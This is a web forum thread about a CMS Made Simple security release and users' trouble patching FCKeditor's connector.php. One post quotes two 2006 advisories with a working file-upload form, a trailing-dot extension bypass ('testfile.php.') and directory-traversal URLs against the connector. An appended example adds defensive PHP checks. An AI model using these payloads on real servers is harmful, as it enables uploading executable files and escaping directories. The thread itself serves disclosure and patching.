0.12.2 Released! Please READ!

Project Announcements. This is read-only, as in... not for problems/bugs/feature request.
Ted
Power Poster
Posts: 3329
Joined: Fri Jun 11, 2004 6:58 pm
Location: Fairless Hills, Pa USA

Re: 0.12.2 Released! Please READ!

Post by Ted »

Basically, the connector.php file isn't checking permissions.  If used the right way, it can cause someone to upload anything to the uploads/images directory.  My 2nd reply above basically explains how to fix it.  I assume it'll be the same process in TinyMCE.
fredt
Forum Members
Posts: 144
Joined: Mon Jun 27, 2005 10:36 am
Location: Southern France

Re: 0.12.2 Released! Please READ!

Post by fredt »

OK, I hand-patched my good old 0.11.2. Hope 0.13 arrives soon!
MichaelK

Re: 0.12.2 Released! Please READ!

Post by MichaelK »

I updated to the latest version 0.12.2 and there's an error with the image browser.

When I wanna put an Image in my editor it won't work anymore. When I delete the code:
require_once(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(__FILE__)))))))))) . '/include.php');
check_login();
Then it works just fine!!!

This fix is not good I think.... Please help!!!!!!
Ted
Power Poster
Posts: 3329
Joined: Fri Jun 11, 2004 6:58 pm
Location: Fairless Hills, Pa USA

Re: 0.12.2 Released! Please READ!

Post by Ted »

Is anyone else having an issue with this patch?  I just tested it in 3 different places and fck image browser still works when logged in.
evoluzzer
Forum Members
Posts: 27
Joined: Thu May 19, 2005 9:11 pm

Re: 0.12.2 Released! Please READ!

Post by evoluzzer »

Yes, I stumbled over the issue... I got a JavaScript error. The directory listing is missing...

Best regards
Chris
Ted
Power Poster
Posts: 3329
Joined: Fri Jun 11, 2004 6:58 pm
Location: Fairless Hills, Pa USA

Re: 0.12.2 Released! Please READ!

Post by Ted »

Was this an upgrade to 0.12.2?  Or the manual patching?

And I'm assuming this is IE 6...
evoluzzer
Forum Members
Posts: 27
Joined: Thu May 19, 2005 9:11 pm

Re: 0.12.2 Released! Please READ!

Post by evoluzzer »

Oh, I patched it manually. cmsmadesimple is in version 0.12beta or so, but with many changes. Yes, it was IE6...
cyberman

Re: 0.12.2 Released! Please READ!

Post by cyberman »

evoluzzer wrote: cmsmadesimple is in version 0.12beta
Perhaps you should go to 0.12.1 stable :) to the first ...
Ted
Power Poster
Posts: 3329
Joined: Fri Jun 11, 2004 6:58 pm
Location: Fairless Hills, Pa USA

Re: 0.12.2 Released! Please READ!

Post by Ted »

Someone had the same issue while patching a 0.11.1 install this morning.  I'm thinking your best bet is to upgrade fully to 0.12.2.
rllqph

Re: 0.12.2 Released! Please READ!

Post by rllqph »

I didn't have any problem on the upgrade. I already upgraded to PHP 5.1.4!
dirtywhitellama

Re: 0.12.2 Released! Please READ!

Post by dirtywhitellama »

Replacing that one php file fixes the security problem - right? I don't need to do anything else?
tsw
Power Poster
Posts: 1408
Joined: Tue Dec 13, 2005 10:50 pm
Location: Finland

Re: 0.12.2 Released! Please READ!

Post by tsw »

If you are running 0.12.1 then changing that one file will be enough (or you can download the diff package which replaces that file and version.php file).
dcdent

about security flaw

Post by dcdent »

Taken from SecurityFocus

NSAG-№196-23.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product: 
FCKeditor 2.2

Site of manufacturer:
http://www.fckeditor.net

The status: 
19/11/2005 - Publication is postponed. 
19/11/2005 - Manufacturer is notified. 
21/02/2006 - Answer of the manufacturer is absent. 
21/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/893.html

Risk: 
Critical

Description: 
Detour of a filtration of expansions of files is possible.

Influence: 
Loading of the forbidden files on target system. 

Exploit:

<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
File Upload<br> 
<input id="txtFileUpload" type="file" name="NewFile"> 
<br> 
<input type="submit" value="Upload"> 
</form>

In the end of a name of a loaded file to put a symbol "."(dot) (an example: testfile.php.) 
As a result on a server the file testfile.php will be created

Decision:
The decision from the manufacturer is not known. Contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!

www.nsag.ru 
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
and

Advisory:
NSAG-№195-23.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product: 
FCKeditor 2.0 FC

Site of manufacturer:
http://www.fckeditor.net

The status: 
19/11/2005 - Publication is postponed. 
19/11/2005 - Manufacturer is notified. 
21/02/2006 - Answer of the manufacturer is absent. 
21/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/952.html

Risk: 
Hide

Description: 
The output for limits of a virtual directory is possible.

Influence: 
Listing of directories, creation of folders outside a virtual directory.

Exploit:

http://SERVER/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=../../

http://SERVER/filemanager/browser/default/connectors/php/connector.php?Command=CreateFolder&Type=File&CurrentFolder=../../&NewFolderName=TESTNAME

Decision: 
To address on a site of the manufacturer http://www.fckeditor.net
Or contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected
from a various sort of attacks of malefactors!

www.nsag.ru 
«Nemesis» © 2006
------------------------------------ 
Nemesis Security Audit Group © 2006.
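
Added example (not part of the post above, and not FCKeditor or CMS Made Simple code): server-side checks that address the two quoted advisories, normalising the upload name before the extension test and confining CurrentFolder to the upload root. The function names, ALLOWED_EXT and the demo directory are assumptions; it needs PHP 7.1 or later.

```php
<?php
// Added example; safe_upload_name(), safe_folder() and ALLOWED_EXT are hypothetical names.
const ALLOWED_EXT = ['gif', 'jpg', 'jpeg', 'png'];

// Returns a sanitised file name, or null when the upload must be rejected.
function safe_upload_name(string $clientName): ?string
{
    // Drop any directory part, treating both separators alike on every host OS.
    $name = basename(str_replace('\\', '/', $clientName));
    // Strip trailing dots and spaces BEFORE the extension check, so that
    // "testfile.php." is judged as "testfile.php" (Windows file APIs drop them).
    $name = rtrim($name, '. ');
    if ($name === '' || preg_match('/[\x00-\x1f<>:"|?*]/', $name)) {
        return null;
    }
    $parts = explode('.', strtolower($name));
    if (count($parts) < 2 || $parts[0] === '') {
        return null; // no extension, or a dotfile such as ".htaccess"
    }
    // Strict policy: every dot-separated suffix must be allowed ("x.php.jpg" fails).
    foreach (array_slice($parts, 1) as $ext) {
        if (!in_array($ext, ALLOWED_EXT, true)) {
            return null;
        }
    }
    return $name;
}

// Resolves CurrentFolder under $baseDir; returns the real path, or null if it escapes.
function safe_folder(string $baseDir, string $currentFolder): ?string
{
    $base = realpath($baseDir);
    $target = $base === false ? false : realpath($base . '/' . $currentFolder);
    if ($target === false || !is_dir($target)) {
        return null;
    }
    // Compare with a trailing separator so "/uploads_evil" cannot pass for "/uploads".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Constructed inputs modelled on the two advisories: a trailing-dot name,
// a harmless name, a folder inside the root, and a traversal out of it.
$base = sys_get_temp_dir() . '/uploads_demo';
@mkdir($base . '/images', 0700, true);
var_dump(safe_upload_name('testfile.php.'));
var_dump(safe_upload_name('photo.jpg.'));
var_dump(safe_folder($base, '/images/'));
var_dump(safe_folder($base, '../../'));
```

For CreateFolder, NewFolderName needs the same basename and character checks as the file name, because realpath() cannot vet a folder that does not exist yet.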
miss_d_bus
Forum Members
Posts: 121
Joined: Sun May 01, 2005 4:27 pm
Location: Kent, UK

Re: 0.12.2 Released! Please READ!

Post by miss_d_bus »

I get this JavaScript error when trying to insert an image too:

Line:118
Char:2
Code:0
Error:Object required
URL:http://www.domain.com/modules/FCKeditor ... slist.html

I upgraded to 0.12.2 from 0.11.2 I think it was.
I'm using IE6 if that helps...
Ted
Power Poster
Posts: 3329
Joined: Fri Jun 11, 2004 6:58 pm
Location: Fairless Hills, Pa USA

Re: 0.12.2 Released! Please READ!

Post by Ted »

You made the patch to connector.php?  It wasn't a full upgrade, right?